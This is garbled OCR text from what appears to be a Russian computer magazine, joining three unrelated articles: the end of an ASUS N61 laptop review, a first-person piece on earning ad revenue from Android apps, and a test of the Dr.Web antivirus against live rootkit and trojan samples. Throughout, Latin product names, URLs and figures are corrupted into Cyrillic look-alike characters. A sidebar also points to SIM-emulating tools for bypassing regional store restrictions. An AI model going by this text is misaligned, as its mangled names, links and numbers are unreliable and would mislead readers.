коллег (ОеекЬепсЬ и Сгузіаітагк]. Не забыли мы и про Зирег РІ (утилита, 
которая оценивает производительность процессора при расчете числа 
«пи»сзаданным числом знаков послезапятой] итест, встроенный в ар- 
хиватор ѴѴіпРАР (полезен при оценке связки процессора и подсистемы 
оперативной памяти]. При проверке времени жизни автономной работы 
яркостьэкрана была выведена на максимум, а сам ноутбук по-прежнему 
функционировал в профиле, обеспечивающем максимальный уровень 

РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ 

БирегРІ тосі.1 .5X5, 1 М: 13,4 с 
ѴѴіпРАР: 1124 Кбайт/с 
ЗОМагк’ОЗ: 21717 
ЗОМагк’Об: 7789 
СгузІаІМагк 2004Р2: 149254 
ОеекЬепсЬ: 4841 

РаззМагк Реііогтапсе Тезі: 704,3 
Температура СР11/Н00: 51°/34° 

Экономный режим: 2 ч 32 мин 
Работа с ѴѴі-Рі: 2 ч 18 мин 
Просмотр видео: 1 ч 33 мин 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



• Дисплей: 16”, 1366x768, глянцевый 

• Процессор: Іпіеі® Соге™ І7-620М, 2.67 ГГц 

• Чипсет: Іпіеі® НМ55 Ехргезз СІіірзеІ 
(АиЬигпсІаІе ІМС) 

• Память: 4096 Мбайт П0КЗ-1066 

• Видео: АТІ МоЬіІіІу Рабеоп НО 5730, 

1024 Мбайт+ Іпіеі® СМА НО 

• Винчестер: 640 Гбайт, ТозЫЬа 
МК646565Х, ЗАТА НОВ, 5400 об/мин 

• Оптический привод: НІ-ВТ-5Т 6Т30И, 0Ѵ0-ПѴѴ 

• Порты: 1х О 3.0, 2х О 2.0, 1х е-ЗАТА, 
ЕхргеззСагб/34, НВМІ, ѴСА, 2хАибіо, карт-ридер 

• Коммуникации: ѴѴі-Рі 802.11Ь/д/п, 

Віиеіооііі 2.1+Е0Р, І.АН 

• Батарея: 4400 мАч, Ы-іоп 

• Операционная система: ѴѴіпбоѵѵз 7 ІШітаІе х64 

• Размеры, вес: 384x264,9x37,3 мм 

• Масса: 2,79 кг 



эффективности. Время жизни аккумулятора мы замеряли как в режиме 
НеасІег’зТеБІ (режим полного покоя, используется утилита Ваііегу Еаіег 
Рго 2.5], так и при включенных системных программах с активны м ѴѴі-Рі . 
Третий, заключительный замер времени автономной работы мы сделали 
для любителей посмотреть кино на экране мобильного компьютера. 

Нами запускался ОѴО-дисксфильмом, включались на полную громкость 
динамики, и яркостьэкрана выставлялась на максимум. 

ВЫВОДЫ 

Протестированный ноутбук показал себя с лучшей стороны. В принципе, 
проблематично найти какие-нибудь веские недостатки, так что при- 
дется докапываться кмелочам. Во-первых, при покупке стоитобратить 
внимание на то, что крышка ноутбука — глянцевая. Кому-то это может 
и не понравиться. Во-вторых, столь современная и производительная 
платформа стоит приличных денег, итакой ноутбук не каждому по кар- 
ману. Но при этом он отличается высоким уровнем производительности, 
развитой функциональностью. Он подойдет как для работы, так и для 
игр.такчто вуспехеА51І5 N61^ мы ничуть не сомневаемся. □С 




ТРЕЫОСШВ 



Подробнее о ноутбуках АЗИЗ серии N и других гаджетах вы можете 
узнать в новом дискуссионном сообществе на ІгепбсІиЬ.ги. 

Тгепб СІиЬ — дискуссионный клуб для тех, кто интересуется прогрессом 
и задумывается о будущем. Участники Тгепб СІиЬ обсуждаюттехничес- 
кие новинки, информационные технологи и, футурологию и другие темы 
завтрашнего дня. 

Тгепб СІиЬ поддерживается компаниями Іпіеі и А51І5 и проводит регу- 
лярные конкурсы с ценными призами. 

Корпорация Іпіеі, ведущий мировой производитель инновационных полупроводнико- 
вых компонентов, разрабатываеттехнологии, продукцию и инициативы, направлен- 
ные на постоянное повышение качества жизни людей и совершенствование методов 
их работы. Дополнительную информацию о корпорации Іпіеі можно найти на ѴѴеЬ- 
сервере компании Іпіеі бІІр://\л/\л/\л/.іпІе1.ги, атакже на сайте ЬіІрУ/Ыодз. іпіеі. сопл. Для 
получения дополнительной информации о рейтинге процессоров Іпіеі посетите сайт 
ѵѵѵѵѵѵ. іпіеі. ги/гаііпд . 
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Зарабатываем на приложениях 
для мобильной платформы от Соодіе 



Идеи зарабатывать на мобильных приложениях у меня никогда не было. Опыта 
разработки для мобильной платформы - тоже. Даже телефон на АпсІгоісІ оказал- 
ся у меня совершенно случайно. Но пара вечеров экспериментов и неожиданно 
удачная идея позволили за 2 месяца заработать более $1000. 

Зто гораздо больше, чем я мог ожидать :)! 



Сразу хочу предупредить, что не собирался 
писать пособие, как заработать миллион. Хотя 
бы потому, что если бы знал, то ни за что бы 
не рассказал. А вот чем я готов поделиться, 
так это подходами и механизмами, которые 
позволяют разработчикам зарабатывать на 
приложениях для АпсІгоісІ. Но прежде чем 
рваться в бой, нужно рассказать пару слов о 
самой платформе. 

ОТКУДА ВЗЯЛСЯ АШОШ? 

Соодіе АпбоісІ — мобильная операцион- 
ная система, в основе которой лежит ядро 
Ыпих. Как и многие другие проекты Соодіе, 
технология изначально разрабатывалась 
компанией АпсІгоісІ, I пс. , которую поисковый 
гигант купил в 2005 году, наняв всех веду- 
щих разработчиков. В 2008 году состоялся 
первый релиз платформы. АпсІгоісІ сегодня 
— это зрелая мобильная ОС, для которой 
уже выпущено несколько серьезных обнов- 
лений. К концу этого года будет продаваться 



уже более 100 моделей телефонов на базе 
АпсІгоісІ от НТО, Моіогоіа, Затзипд, Оеіі, 
Ниаѵѵаі, 5опу Егісббоп и других 
брендов. Если верить Эрику Шмидту, одно- 
му из главных лиц в Соодіе, то уже сегодня 
каждый день продается более чем 60 тысяч 
АпсІгоісІ -устройств по всему миру — короче 
говоря, налицо тенденция к массовому рас- 
пространению. Впрочем, что еще ожидать от 
платформы, которую курирует сам Соодіе? 
Наиболее распространённым сейчас 
является девайс НТС 01 — очень непло- 
хое устройство по соотношению «цена- 
качество». Именно его я использую для 
отладки рабочих проектов. Правда, если 
хочешь покупать устройство сейчас, то я 
настоятельно рекомендую взглянуть на 
что-нибудь более современное, вроде НТС 
ІЧехиБ Опе или Моіогоіа ОгоісІ. Обзоров 
устройств и самой платформы в Сети — 
миллион, поэтому на этом я останавливать- 
ся не буду. 



ПРИЛОЖЕНИЯ ДЛЯ АШ0Ю 

С популярностью платформы растет и количе- 
ство приложений. К счастью, давно прошли 
времена, когда нужно было вручную искать 
программу в инете, потом закачивать дис- 
трибутив в телефон и только там его устанав- 
ливать. Все ведущие производители создают 
удобные площадки для распространения 
приложений — каталоги, позволяющие прямо 
с телефона найти и установить нужную тулзу, 
прочитать отзывы, а если она платная, то и 
купить ее. Первопроходцем, поставившим на 
рельсы подобную схему, стала Арріе, начав 
разработку и доведя до неимоверных масшта- 
бов Арр Эіоге. У ІЧокіа такая площадка назы- 
вается ІМокіа Оѵі Эіоге, Місгобоіі после анонса 
своей новой мобильной ОС ѴѴі псіоѵѵб РЬопе 
представила обновленный Місгобоіі Магкеі 
Ріасе. У АпсІгоісІ такая площадка тоже есть и 
называется АпсІгоісІ Магкеі. 

Виртуальные магазины наполняются про- 
дукцией от компаниий-создателей, а 
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АпсІгоісІ Магкеі на телефоне 
позволяет быстро найти и уста- 
новить приложения 



также сторонних разработчиков и часто от 
программистов-одиночек. Для предотвраще- 
ния распространения фишинговых программ 
и вирусов, на всех площадках обязательно 
работает модерация. Правда, политика раз- 
мещения приложений на площадках различа- 
ется: на том же Арр Біоге’е существует премо- 
дерация, и твое приложение может довольно 
долго проторчать в очереди на модерацию, 
в то время как в АпсІгоісІ Магке* принята 
политика постмодерации. К тому же на іРЬопе 
существуют очень жесткие правила для при- 
ложений как по техническому исполнению, так 
и функциональному — поэтому нет никакой 
гарантии, что твоя разработка, будь даже она 
чрезвычайно полезной и удобной, попадет 
в каталог. Площадка АпсІгоісІ Магке* в этом 
плане намного более либеральна. Есть еще 
одно отличие: легально устанавливать ПО для 
іРЬопе предполагается исключительно через 
АррЗіоге, вто время как АпсІгоісІ позволяет 
грузить программы откуда угодно. В каждом 
подходе есть и плюсы и минусы, не будем в 
них углубляться, а примем как должное. 

Рынок приложений для АпсІгоісІ относительно 
небольшой, но растет ошеломляющими тем- 
пами. Для примера, в АпсІгоісІ Магке* коли- 
чество приложений удвоилось за три месяца, 
достигнув значения 30 тысяч. Конечно, еще 
далеко до показателей Арр 5*оге, но все еще 
впереди. Несмотря на слово Магке* («рынок» 
в переводе с английского], большая часть 
распространяемых через систему приложе- 
ний бесплатна или, по меньшей мере, имеет 
чуть урезанную бесплатную версию. Тут стоит 
заметить, что оплата приложений осущест- 
вляются через Ооодіе СЬескоіЛ, который так 
же, как и РауРа I, снимает деньги с привязан- 
ной к аккаунту пластиковой карты. Но, увы, 
для нас — жителей ех-ІІ55Р пока возмож- 
ность приобретать приложения официально 
закрыта. Но если постараться (подробнее — в 
боковом выносе], то приобрести понравив- 




шуюся игрушку и прогу все-таки можно, при- 
чем тут есть один интересный момент. Если в 
течение суток ты удалишь с телефона платное 
приложение, то деньги с твоего счета не сни- 
мутся. Такой вот гарантированный топеубаск 
на 24 часа. 

МОЖНО ЛИ ЗАРАБОТАТЬ 
НА ПРОДАЖАХ? 

Раз приложение можно купить, то, стало быть, 
можно и продать? :] Переходим к самой вкус- 
ной части повествования, а именно вопросу: 
на чем, собственно, можно заработать. Идея 
разработать приложение и попробовать убе- 
дить пользователей в том, что за определен- 
ное вознаграждение оно достойно оказаться 
на их телефонах, напрашивается сама собой. 
Тем более, всю схему продажи уже давно при- 
думали для тебя — добро пожаловать на дру- 
гую сторону АпсІгоісІ МагкеТ, предназначенную 
для разработчиков. 

Напомню, что в магазине от Соодіе исполь- 
зуется пост-модерация, это значит, что при- 
ложение проверяется на вшивость уже после 
того, как оно попало на виртуальный при- 
лавок. Но чтобы магазин тут же не заспамили 
и не засорили бессмысленной и опасной 
ерундой, компания взымает с каждого раз- 
работчика небольшой взнос. Поэтому, чтобы 
ты мог опубликовать приложение в АпсІгоісІ 
Матке* (даже бесплатное], необходимо запла- 
тить немного американских долларов, а имен- 
но $25. 

Не то чтобы серьезная помеха на пути к мил- 
лионам — платим. Теперь можно начать про- 
давать? Нет! К сожалению, если ты родился 
не в той стране (а скорее всего так и есть], то 
продавать приложения ты пока не сможешь. 
Дело в том, что продавец для работы обя- 
зательно должен оформить учетную запись 
МегсЬап* Ассоип* Соодіе СЬескои*, а гражда- 
не бывшего СССР в список тех, кто может это 
сделать, не входят. Жутко напоминает ситуа- 
цию с РауРа I, где возможности принимать 
платежи как нет, так в ближайшем будущем и 



не предвидится. И это серьезный облом! 

Да, можно попробовать работать через 
посредника. Первый вариант — друзья и 
родственники за границей, имеющие счета в 
локальных банках. Другой вариант — специ- 
альные компании-посредники, которые при 
желании легко ищутся через поисковик и 
предлагают свои услуги за 10-20% от стоимо- 
сти каждой продажи. Успешного сотрудниче- 
ства у меня ни с одной из них не было, поэто- 
му конкретные компании я тебе советовать не 
буду. Если работать через посредников жела- 
ния нет, а продавать приложения все-таки 
хочется, то есть еще один вариант — альтер- 
нативные магазины. Наиболее популярными 
счита ются : 

• БІісІеМ Е ( ѵѵѵѵѵѵ.зіісіете.огд ]: 

• АррзЫЬ ( ѵѵѵѵѵѵ.аррзІіЬ.сопп/сІеѵеІорегз ]: 

• АпсІАрр5*оге ( апбаррзіоге.сот і 
Модель распространения приложений 
через эти площадки мало чем отличается от 
АпсІгоісІ МагкеС пользователь устанавливает 
специальное приложение и с помощью него 
ищет нужные ему программы. Увы, аудито- 
рия у альтернативных магазинов ничтожно 
маленькая, но даже здесь можно зарабаты- 
вать. В том же ВІісІеМЕ моя первая продажа 
прошла через день после добавления в 
каталог. Правда, уже через день, когда счет- 
чик продаж остался на все том же значении, 
стало ясно, что состояния на этом не ско- 
лотишь. Аудитория пользователей АпсІгоісІ 
очень разборчива, причем на данный 
момент состоит преимущественно из гиков. 
Всякая ерунда, которая «на ура» продается 
для іРЬопе, может вообще не иметь продаж 
для АпсІгоісІ. Существуют даже целые иссле- 
дования, в которых подробно анализируется 
этот вопрос. Если хочешь продать програм- 
му для АпсІгоісІ, то это должен быть исклю- 
чительно качественный софт, безупречно 
написанный и обновляемый. Моя продажа 
на ВІісІеМЕ стала для меня последней: я 
сделал приложение бесплатным и вставил в 
него рекламу. 
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Мое приложение Хтаз Тгее, на котором удалось заработать более 
$1500 за 2 месяца 



$$$ ЗА ПОКАЗЫ 

Да, именно рекламу. Я решил так: раз я 
не могу убедить пользователей купить 
мое приложение, то пусть пользуются им 
бесплатно, но не обижаются на рекламу. 

И в том, и другом случае я буду получать 
деньги. Модель стара как мир и называет- 
ся АбѴѴаге, но появление мобильных при- 
ложений буквально вдохнуло в нее новую 
жизнь. Когда приложение появляется в 
каталоге, получает высокий рейтинг и 
хвалебные комментарии пользователей, 
количество загрузок может в считанные 
дни достичь нескольких тысяч — и это без 
какой-либо рекламы и вложений. А если 
прога хороша, то показы рекламы гаран- 



тированы! Вполне реально написать сред- 
ненькое (возможно, сезонное] приложение, 
вставить в него рекламу и опубликовать 
на Апбгоіб Магкеі:, при этом очень скоро 
начав получать профит. 

Для начала нам необходимо выбрать про- 
вайдера рекламы. Это специальные сервисы, 
которые автоматически будут подкачивать 
рекламу тебе в приложение, удовлетворяю- 
щую заданным критериям, избавляя тебя 
от необходимости самому искать рекла- 
модателей. Поставщиков рекламы, как и 
баннерных сетей для обычных веб-сайтов, 
по-настоящему много, но как всегда есть 
лидеры: 

• (ЭиаНго ѴѴігеІезз [ диаигоѵуігеіезз.сот ); 



• АсіМоЬ ( абтоЬ.сот ). 

Схема работы у обоих провайдеров при- 
мерно одинаковая: ты скачиваешь спе- 
циальную библиотеку, подключаешь ее 
к своему проекту и далее на сайте про- 
вайдера регистрируешь новую рекламную 
кампанию. После регистрации тебе дается 
уникальный код, который ты в свою оче- 
редь прописываешь в своем приложении. 
Процесс подключения рекламных модулей 
от А до Я расписан на сайтах провайдеров, 
с подробными примерами и видеоролика- 
ми — никаких проблем тут возникнуть не 
должно. 

Чаще всего оплачиваются не показы рекла- 
мы, а клики по рекламным объявлениям. 
Причем, чем больше будет соотношение 
клик/показ (такой показатель называется 
СТР], тем больше будут стоить те самые 
клики, поэтому в наших интересах показы- 
вать ту рекламу, на которую пользователь 
может клинуть. Для этого к твоим услугам 
предлагаются настройки таргетинга: у тебя 
всегда есть возможность управлять содер- 
жанием рекламных объявлений, выбирать 
категории, фильтровать баннеры по задан- 
ным параметрам. Для примера: у меня есть 
одно приложение, которое могут исполь- 
зовать дети, и им не очень нужно видеть 
рекламу на аб и И;- контент. Также с помощью 
управления рекламными кампаниями можно 
методом научного тыка найти самые опти- 
мальные рекламные категории, и в зави- 
симости от типа приложения постараться 
подобрать таргетированную рекламную 
кампанию. 

Максимально быстрое распространение 
может быть достигнуто только, если ты доба- 
вишь программу в Апбгоіб МагкеЕ Процесс 
сабмита в каталог, о котором мы уже говорили 
в предыдущем разделе, не займет много вре- 
мени. Тебе понадобится аккаунт на Апбгоіб 
Магкеі; ( тагкекапбгоіб.сот/риЫізЬ/Ноте ). 
где на специальной страничке надо запол- 
нить описание приложения, добавить скрин- 
шоты и загрузить само приложение. Через 5 
минут его смогут скачать счастливые поль- 
зователи — значит, рекламные сообщения 
показываются и денежки на виртуальный 
счет капают. 

КАК ВЫВЕСТИ ДЕНЬГИ? 

По своему опыту могу сказать, рвет всех по 
отдаче: буквально за 2 недели с момента 
публикации приложения на моем внутрен- 
нем счету было 200 долларов. А за ноябрь 
и декабрь 2009 года на одной этой площад- 
ке я заработал уже более 1 100 долларов. 
Если быть честным, то на подобную отда- 
чу я даже не надеялся. Приложение было 
сезонным и очень простым. С помощью 
Хтаз Тгее пользователи могли виртуально 
нарядить Рождественскую елку и установить 
его в качестве ѵѵаіірарег'а или отправить 
картинку другу. Для того чтобы оценить всю 
простоту, можешь установить приложение и 
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НА НЕМ РАЗРАБАТЫВАЮТСЯ 
ПРИЛОЖЕНИЯ ДЛЯ АШОЮ? 



Основным языком для разработки приложений 
является Оаѵа. Для того чтобы начать, нужно две 
вещи: 

• АпсігоісІ 50К ( ; сот/збк); 

• любимая ЮЕ для Оаѵа (Есіірзе, Іпіеііи ЮЕА, 
ІЧеіВеапз — все равно). 

Всю документацию и примеры можно найти на 
официальном сайте сот . Создать 

свое первое приложение на Ооодіе АпсігоісІ не 
просто, а очень просто. На том же сайте 

есть мануал с картинками для разных 
ЮЕ, более того, можно создать приложение вообще 
с помощью одного лишь «Блокнота», но это способ 
для настоящих джедаев. С появлением АпсігоісІ 
ІЧаОѵе Оеѵеіортепі КМ; для разработки стало воз- 
можным использовать еще и Си. 

Протестировать получившееся приложение можно 
на любом девайсе с платформой АпсігоісІ, для этого 
в 5БК есть специальный драйвер для подключения 
через 115В. Но если у тебя еще нет девайса — это 
не беда, в 5БК входит полнофункциональный 
эмулятор [ беѵеіорег.апсігоісі.со 

ШІ). Именно на таком эмуляторе 
я отлаживал свои первые приложения, ругаясь на 
чрезмерную тормознутость. Зато с помощью АпсігоісІ 
Етиіаіог'а легко симулировать высокоскоростное 
или, наоборот, медленное соединение, эмулиро- 
вать входящее 5М5 или звонок, и т.д. В результате 
отладка приложения подчас становится еще удоб- 
нее, чем на настоящем телефоне. 

Напоследок расскажу о маленьком финте ушами, 
позволяющем буквально за два часа написать 
готовую игру для Ооодіе АпсігоісІ. Алгоритм прост: 
создаем проект, вставляем на форму компонент 
ѴѴеЬѴіеѵѵ, пишем немного кода — и наш мега- 
движок для игр готов. Секрет в том, что таким обра- 
зом мы создаем вполне рабочий браузер, в котором 
можем открыть любое приложение на ЗаѵаЭсгірГе 
(а в скором и на ЕІазЬ'е). Причем для конечного 
пользователя она ни чем не будет отличаться от 
других игр. Таким образом, можно выпускать по 
одной игрушке в неделю, не особо заморачиваясь 
изучением программирования непосредственно 
под АпсігоісІ. 




С помощью АпсігоісІ Етиіаіог'а можно 
разрабатывать и отлаживать мобиль- 
ные приложения вообще без теле- 
фона 



КАК РАБОТАТЬ С РАЗНЫМИ 
ПРОВАЙДЕРАМИ РЕКЛАМЫ? 



Для более эффективного заработка на рекламе, 
можно работать с несколькими провайдерами рекла- 
мы одновременно. Это позволяет сервис АбѴѴЫгІ 
( ), позволяющий избавиться от 

мучительного выбора между АбтоЬ или ОиаІТго 
ѴѴігеІезз. Вместо этого компания предоставляет раз- 
работчикам возможность получить доступ к несколь- 
ким рекламным сетям одновременно, что позволяет 
им компенсировать затраты, когда в одной сети не 
хватает количества просмотров страниц (а это ино- 
гда случается). Для работы необходимо интегриро- 
вать в приложение библиотеку из АбѵѵЫгІ ЭйК, при 
этом все компоненты распространяются исключи- 
тельно в открытых исходниках. 



РКЕЕѴ5 РАЮ 

■ Ггес ■ Рімо 



0І5ТІМ0 



% 




Интересная статистика: отношение 
платных и бесплатных приложений для 
разных мобильных платформ 



сейчас. Если у тебя нет подходящего телефона, то опи- 
сание проги и скриншоты можно посмотреть с помощью 
специального веб-клиента для АпсігоісІ Магкеі'а — ѵѵѵѵѵѵ. 
апсІгоІіЬ.сопп . Ты будешь смеяться, но разработка этой 
программы заняла 2-3 дня, при условии, что у меня не 
было опыта ни в Оаѵа, ни в разработке под данную плат- 
форму. Сейчас оно дает максимум 6 долларов в день, но 
и это неплохо. 

О иаІТ го ѴѴігеІезз посылает деньги раз в 2 месяца и не 
менее 100 долларов. АбтоЬ.сот также платит исправ- 
но, но отдача от него намного слабее, хотя сама рекла- 
ма оформлена у них лучше и красивее. Деньги можно 
выводить разными способами: банковский чек, Рау Ра I, 
ЕЕТ. Получив неплохой бонус на виртуальном счету 
ОиаІТго ѴѴігеІезз, я запоздало узнал об ограничении 
Рау Ра I, не позволяющем принять деньги на счет поль- 
зователям из стран СНГ. Но со мной связалась служба 
поддержки и предложила перевести деньги по ЕЕТ 
(это обычный перевод на твой счет в банке). Для этого 
пришлось сходить в отделение банка и взять необхо- 
димые для перевода реквизиты (номер счета, 5ѴѴІЕТ 
код, и еще некоторые данные — они могут разниться от 
банка к банку). Уже через неделю на мою карту пришли 
деньги. Комиссия в $30, которую взымает банк за каж- 
дый такой перевод, не могла испортить настроение от 
неожиданного заработка. 

Конечно, мне во многом повезло, и далеко не факт, что 
любой начатый проект также успешно выстрелит. Поэтому 
я как не рассматривал, так и не рассматриваю этот способ 
как основной источник дохода. Но то, что на приложени- 
ях для АпсігоісІ можно зарабатывать — это я тебе говорю 
совершенно точно.. ~іг 




> іпіо 



• Если решишься про- 
давать приложения на 
АпсігоісІ Магкеі через 
посредника, то ищи 
контакты в Австрии, 
Франции, Германии, 
Италии, Японии, Нидер- 
ландах, Испании, 
Великобритании и 
Штатах. Граждане этих 
стран могут завести себе 
необходимый для про- 
дажи МегсбапіАссоипІ 
Ооодіе СЬескоиІ. 

• Чтобы снять ограниче- 
ние на покупку платных 
приложений, при- 
ходится использовать 
специальные програм- 
мы, которые эмулируют 
ЗІМ-карты западных 
операторов (например, 
Т-МоЫ1е). Это програм- 
ма МагкеіЕпаЫег ІсосІе. 
аооаіе.сот/р/ппагкеі- 
епаЫег ] и МагкеіАссезз 
(атір.огд.ги/ѵѵікі/ 
апсігоісі/тагкеіассезз ). 




> СІѴСІ 

На дискеты найдешь 
ЭБКдля разработки 
приложений для 
АпсігоісІ. 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

• Интересный блог 
разработчиков 
АпсігоісІ: апбгоісі- 
сІеѵеІорегз.ЫодзроІ.сот 

• Видео о разработке 
под АпсігоісІ: беѵеіорег 
апсігоісі.сопп/ѵісіеоз 

• Список из 1 00 теле- 
фонов на АпсігоісІ, 
которые будут прода- 
ваться к концу года: 
ѵѵѵѵѵѵ.доодІеапсІЫод. 
сот/оѵег-1 ОО- 
сІЮегепІ-апсІгоісІ- 
рЬопез/31 530 
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■ ■ Дмитрий Ленский Іепзкуі.сШдтаіІ.сот 






ОК. ѴѵЕВ: 

18 ЛЕТ СПУСТЯ 




НАШ ТЕСТ-ДРАЙВ 
НОВОЙ ВЕРСИИ АНТИВИРУСА 

Первая версия ОосіогѴѴеЬ появилась еще 
в 1992 году. Я до сих пор помню, как сло- 
вил свою первую заразу, а потом лечил ее 
запущенным с дискеты «вебом», фанатея от 
того, как он управляется с вирусом. Тогда это 
все казалось чем-то фантастическим. Но и 
сегодня, когда на рынке доступна масса анти- 
вирусных решений, продукты Ог.ѴѴеЬ остаются 
одними из лидеров отрасли. 

По правде говоря, с антивирусными решения- 
ми я не экспериментировал довольно давно. 
Перебиваясь бесплатными программами и 
своевременными апдейтами, проблем я дол- 
гое время не знал. Если бы не дело случая, 
то и знакомства с последней версией Ог.ѴѴеЬ 
вероятно и не было. 

Для хранения файлов в Сети я уже давно 
использую замечательный сервис от Яндекса 
— Яндекс. Диск, который теперь интегрирован 
в старый добрый «Народ. ру». Залив в один 
прекрасный день архив с хорошо знакомым 
мне бинарником, я увидел сообщение, что 
файл инфицирован. Ручной анализ показал, 
что в исполняемый файл действительно был 
хитро заджоинен троян, при этом установ- 
ленные на моей машине сканеры заразы не 
обнаружили. Оказалось, что для антивирусной 
проверки Яндекс использует решения от 
«Доктор Веб»: им проверяется как вся кор- 
респонденция их почтового сервера, так и 
файлы на «народном» хостинге. С чего такая 
любовь? У меня был положительный опыт 
использования бесплатной утилиты Ог.ѴѴеЬ 
СигеШ, которая за последнее время выручала 
меня не раз. Но посмотреть, на что способен 
полноценный Ог.ѴѴеЬ, было, по меньшей мере, 
любопытно. 

ТЕХНОЛОГИИ САМОЗАЩИТЫ 

Для теста я скачал демо-версию самого топо- 



вого продукта для домашнего пользователя — 
Ог.ѴѴеЬ ЗесигіТу Зрасе Рго, представляющего 
собой комбайн из антивируса и файрвола. В 
предвкушении полевых испытаний, я сразу 
стал устанавливать антивирус на одну из 
своих виртуалок, и тут меня поджидал первый 
сюрприз. Вирус! Дело в том, что прямо во 
время установки запускается сканер (очень 
похожий на СигеШ], который осуществляется 
первичную проверку системы. Оказалось, 
я забыл откатить виртуальную машину до 
предыдущего ЗпарзЬоЕа, и в системе остался 
активный трой, который я когда-то анализи- 
ровал на этой виртуалке. Обнаружить его — 
задача несложная, но безусловно порадовало, 
что это было сделано еще во время установки. 
Фактически это означает, что ты можешь уста- 
новить антивирус на уже зараженную систему 
без предварительного ее лечения. Позже, 
обнаружился еще один любопытный механизм 
для защиты антивируса от атак на самого 
себя (общая технология называется Ог.ѴѴеЬ 
ЗеЬРПОіесІ:). Так, когда ты хочешь выключить 
все механизмы защиты, всплывает окошко с 
запросом САРТСНА'и — и только после ввода 
правильного кода, антивирус выключается. 
Несложно понять, зачем это сделано: таким 
простым способом реализуется вполне дей- 
ственная страховка на случай, если малварь 
захочет деактивировать антивирус, эмулируя 
пользовательский ввод (движение и клики 
мышки, нажатия клавиш клавиатуры). Такой 
хинт с использованием АРІ-функций системы 
мы не раз описывали на страницах журнала. 

НАСКОЛЬКО ЭФФЕКТИВЕН СКАНЕР? 

Впрочем, одной только защиты самого себя 
для хорошего антивируса мало. Гораздо 
интереснее было посмотреть, как Ог.ѴѴеЬ 
детектирует малварь. И тут не придумать 
способ более наглядный, чем прогнать анти- 
вирус в различных реальных ситуациях. Я 



обратился к своим друзьям, активно зани- 
мающимся реверсингом малвари, которые с 
радостью подогнали мне несколько интерес- 
ных образцов руткитов и троев. Я постарался 
выбрать разношерстную малварь, использу- 
ющую различные, в том числе самые совре- 
менные, техники сокрытия в системе. 

Подход к тестированию прост: берем дев- 
ственно чистую ось, заражаем ее вирусом 
и, установив антивирус, пробуем выле- 
чить заразу, затем оцениваем результат. 
Первоначально я хотел провести все в рам- 
ках виртуальной машины, но ради чистоты 
эксперимента тестирование было решено 
перенести на вспомогательную машину. 

Это нужно из-за того, что часть руткитов 
успешно определяет запуск в виртуальном 
окружении и инфицирование системы наме- 
ренно не производит («Ага, анализировать 
меня собрался? Отвали!»]. В качестве ОС на 
тестовой машине была выбрана ѴѴіпсІоѵѵз ХР 
со всеми установленными сервиспаками и 
апдейтами. Проблема возвращения системы 
к изначальному состоянию после заражения 
легко решилась с помощью образа, который 
я заливал с помощью Тгиеітаде. 

Далее нужно было разобраться, что считать 
фактом лечения? Понятно, что одного толь- 
ко сообщения «Я нашел вирус, надо что-то 
делать!» недостаточно. К тому же мы не 
сильно доверяем фразам а-ля «Ура, вирус 
удалось удалить», поэтому всякий раз, после 
сообщения об успешном лечении, мы будем 
делать слепок реестра и файловой систе- 
мы, чтобы посмотреть, что, по сравнению с 
чистой системой, изменилось после зараже- 
ния и последующего лечения. Левые ветки 
реестра, бинарники и скрытые потоки ІЧТР5 
говорят о том, что малварь, возможно, уда- 
лена не полностью — в этом случае резуль- 
тат засчитывался как провальный. 

Итак, повторив итерацию для каждого 
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Результаты сканирования 

образца малвари, мы составили таблицу с 
результатами, которую тебе и спешу пред- 
ставить. 

Не надо быть особо проницательным, чтобы 
понять, что символ «+» означает успеш- 
ное детектирование вируса и его лечение. 
Собственно, проблемы возникли только с 
МеЬгооСом, но справедливости ради, стоит 
заметить, что тестирование проводилось на 
новой и пока мало распространенной моди- 
фикации. 

В некоторых случаях срабатывал актив- 
ный монитор БрЮег биагсі, а в других — с 
задачей справлялся сканер, использующий 
сигнатурный и эвристический анализато- 
ры. Антируткит модуль — это, конечно, не 
утилита СМЕВ в умелых руках, но со всей 
участвовавшей в тестировании малварью 
справилась «на ура». 






Ці 



#) 



• ч Ог.ШеЬ Сканер для ѴѴіпскплге 



Файл Настройки Помощь 



Проверка Статистика I 



<• Быстрая проверка 
Полная проверка 
С Выборочно 



В этом режиме проверяются: 

* Оперативная память 

* Загрузочные секторы всех дисков 

* Объекты автозапуска 

* Корневой каталог загрузочного диска 

* Корневой каталог диска установки ѴѴіпсІоѵѵ5 

* Системный каталог Мпбоѵѵз 

* Папка Мои Документы 

* Временный каталог системы 

* Временный каталог пользователя 




ЫЕЙЙИ 



Объект 



I п УІ ь. 



I Статус 



Ь5ЬСЬагдег_5еІ:ир_Ѵ ... С : \ОоситепІ:5 апб 5еШпд5\Ас)тіп\Рабоч ... Т го)ап . Агисег 
ІІ5ЬСНагдег_5е(:ир_Ѵ ... С : \ОоситепІ5 апб 5еШпд$\ АсІтіп\Рабоч , . , Контейнер со держит инфицированные объекты 
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Результаты быстрого сканирования: малварь нашлась 



ФАЙРВОЛ ФАЙРВОЛИТ? 

Помимо непосредственно антивирусной 
защиты, в Ог.ѴѴеЬ БесигіТу Брасе Рго есть 
модуль брандмауэра. Собственно, проявле- 
ние активности файрвола не заставит себя 
ждать. По умолчанию он находится в режи- 
ме обучения, поэтому для любой попытки 
приложения выйти в сеть будет отображать- 
ся окно, с помощью которого ты сможешь 
создать правило: пропускать указанный 
трафик или блокировать. Часть правил по 
умолчанию включена в продукт, но все они 
в основном касаются работы самого Ог.ѴѴеЬ 
БесигіТу Брасе Рго. А вот рулесы для попу- 
лярных приложений (аська, почтовик и т.д.) 
придется прописывать вручную — было 
бы здорово, если основные профили были 
включены по умолчанию. 

Помимо непосредственно файрвола, в про- 
дукт включен НТТР-монитор БрЮег СаТе. По 
этой причине не надо пугаться появившемуся 
в Рі гебох’е новому плагину — это не малварь 
:]. Система в реальном времени проверяет 
контент веб-страницы, причем совместима со 



Ц| ОгіШеЬ Антивирус 



ЗрГОвг биагсі 
5рІОег т\ 

ЗрІОег бэіе 

Родительский контроль 
Локальный доступ: 
Фильтр ІЖ: 

РігеюаІІ 

Модуль Самозащиты 

Последнее обновление ; 
Всего вирусных записей: 



включен 

• включен 
в ек;*очен 

в отключен 

• отключен 

• отключен 
в включен 

• 0 1,04ч 20 10 06:29 
1 197 590 



Устнавливаем параметры для анализа НТТР-трафика 




Быстрая справка об активных 
модулях 



всеми известными браузерами. Чтобы прове- 
рить, насколько хорошо работает анализатор 
